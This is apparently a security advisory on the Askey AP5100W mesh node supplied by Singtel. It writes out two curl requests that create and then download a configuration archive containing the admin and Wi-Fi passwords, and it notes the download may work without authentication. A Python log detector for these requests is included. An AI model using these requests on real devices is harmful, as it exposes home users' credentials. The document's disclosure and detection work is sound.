Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.
The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.
The default login credential of the web interface for the Askey AP5100W is as follows:
Upon successful authentication, an attacker can create a configuration backup with the following command:
curl 'http://IP_ADDR_OF_WEB_INTERFACE/status.cgi?_=1590135633550&service=cfgbackup&act=nvset' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive'
If successful, the response is as follows:
{"nvset":"ok"}
The attacker can then obtain the configuration file (which contains the admin login password, the wifi password, etc.) with:
curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar
In the worst-case scenario, this works regardless of login status: if an admin has backed up the configuration file, the attacker is still able to obtain the admin login password even without authentication.
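For defenders, the two requests above can be flagged in HTTP logs captured by a proxy or network sensor in front of the node. The following is an added example, not part of the original advisory or the vendor's software; the log layout, client addresses and the `classify`/`detect` function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample records: client IP, method, request target, status, bytes.
# The layout is an assumption, not a format produced by the AP5100W.
SAMPLE_LOG = """\
192.168.1.10 GET /status.cgi?_=1590135633550&service=cfgbackup&act=nvset 200 15
192.168.1.10 GET /configs/config.tar 200 20480
192.168.1.77 GET /configs/config.tar 200 20480
192.168.1.77 GET /configs/config.tar 404 0
192.168.1.10 GET /index.html 200 1024
"""


def classify(target):
    """Map a request target to one of the advisory's two requests, or None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if (parts.path == "/status.cgi"
            and query.get("service") == ["cfgbackup"]
            and query.get("act") == ["nvset"]):
        return "backup_created"
    if parts.path == "/configs/config.tar":
        return "backup_download"
    return None


def detect(log_text):
    """Return (client, finding) tuples for successful backup-related requests."""
    creators = set()   # clients seen triggering a backup
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue   # skip blank or malformed records
        client, _method, target, status, _size = fields
        event = classify(target)
        if event is None or status != "200":
            continue
        if event == "backup_created":
            creators.add(client)
            findings.append((client, "backup created"))
        elif client in creators:
            findings.append((client, "download by backup creator"))
        else:
            # Matches the worst case: a client that never triggered the
            # backup still received config.tar.
            findings.append((client, "download by other client"))
    return findings


if __name__ == "__main__":
    for client, finding in detect(SAMPLE_LOG):
        print(f"{client}: {finding}")
```

Any successful download of `/configs/config.tar` means the admin and wifi passwords in that archive should be treated as disclosed.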
The vendor didn’t reply to us despite all the efforts we made.